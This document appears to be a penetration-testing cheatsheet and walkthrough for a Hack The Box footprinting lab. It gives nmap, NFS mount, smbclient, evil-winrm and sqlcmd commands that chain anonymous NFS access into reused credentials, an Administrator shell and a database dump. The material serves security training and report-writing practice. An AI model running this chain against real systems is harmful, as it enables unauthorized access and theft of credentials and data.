🛡️ Methodology Checklist
- Full port scan + service version detection
- Enumerate all discovered services with protocol-specific tools
- Try null/anonymous auth on each service
- SNMP enumeration for credential or config leakage
- IPMI RAKP message hash capture and crack
- Check NFS exports for sensitive data
- Correlate credentials across services (reuse)
- Document attack path from initial access to objective
🎯 Operational Context
Think Dumber First: Hard lab means nothing is given — every service requires active enumeration and creative thinking. Start with a comprehensive port scan on ALL ports (TCP + UDP). The credential for one service is frequently the key to another. Document every finding immediately — the chain will be long.
When you land here: Hard Footprinting Lab. Full port scan first. Enumerate every service found. Look for credential reuse across services. Identify the chain: initial access → privilege escalation → flag capture. The path is non-linear — dead ends are part of the process.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -p- --min-rate=1000 -T4 [TARGET_IP] -oN all_ports.nmap | Fast full port scan |
ports=$(grep "open" all_ports.nmap | cut -d "/" -f 1 | tr "\n" ",") | Parse open ports into variable |
sudo nmap -sV -sC -p $ports [TARGET_IP] -oA detailed_scan | Detailed service scan on open ports |
showmount -e [TARGET_IP] | List NFS exports |
sudo mount -t nfs [TARGET_IP]:/TechSupport ./target_share -o nolock | Mount NFS share |
cat ./target_share/userpass.txt | Read credentials from mounted share |
smbclient -L [TARGET_IP] -U alex | List SMB shares with found credentials |
smbclient //[TARGET_IP]/devshare -U alex | Connect to non-standard share |
get important.txt | Download file from SMB |
evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]' | WinRM shell as Administrator |
sqlcmd -S . -E -Q "SELECT name FROM master.dbo.sysdatabases" | List MSSQL databases (trusted auth) |
sqlcmd -S . -E -Q "SELECT name FROM accounts.sys.tables" | List tables in database |
sqlcmd -S . -E -Q "SELECT * FROM accounts.dbo.devsacc" | Dump table contents |
🔬 Deep Dive & Workflow
Attack Chain: NFS (unauthenticated read) → SMB (authenticated share) → WinRM (shell) → MSSQL (data extraction)
Phase 1: Initial Recon
- Fast all-ports TCP scan + UDP scan for 161 (SNMP)
- Key findings: Port 111/2049 (NFS), 445 (SMB), 5985 (WinRM)
Phase 2: NFS Enumeration (Initial Access)
showmount -e [TARGET_IP]→ find/TechSupport (everyone)- Mount share → find
userpass.txt→ credentialsalex / [PASS]
Phase 3: SMB Pivoting
smbclient -L [TARGET_IP] -U alex→ find non-standarddevshare- Connect to
devshare→ downloadimportant.txt→sa:[PASS](SQL SA + Windows Administrator password)
Phase 4: WinRM Shell
evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]'- Verify:
whoami→winmedium\administrator
Phase 5: MSSQL Data Extraction
sqlcmd -S . -E -Q "SELECT name FROM master.dbo.sysdatabases"→ findaccountsdatabasesqlcmd -S . -E -Q "SELECT name FROM accounts.sys.tables"→ finddevsacctablesqlcmd -S . -E -Q "SELECT * FROM accounts.dbo.devsacc"→ findHTBuser entry
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Service found but no obvious attack path | Service is hardened or requires specific credentials | Continue enumerating other services; look for credential hints in other service outputs |
| Credentials found but not working | Wrong service or wrong format | Try credentials against all open services (FTP, SSH, SMB, web, DB); check case sensitivity and domain format |
| Lab seems complete but no flag | Missed a service or enumeration step | Run a fresh nmap full-port scan including UDP; re-examine all discovered files and configs |
| Network connectivity unstable to lab | HTB VPN issues | Reconnect VPN; restart OpenVPN; try different HTB VPN server region |
| Pivoting required but no pivot tools available | Tool not on attack box | Use SSH dynamic port forwarding (ssh -D 9050) or Chisel if available; check /tmp for pre-installed tools |
📝 Reporting Trigger
Finding Title: (Lab walkthrough — document attack chain for reporting practice: Initial Access method, Lateral Movement steps, Privilege Escalation technique, and Objective completion. This forms the narrative attack chain section of your pentest report.)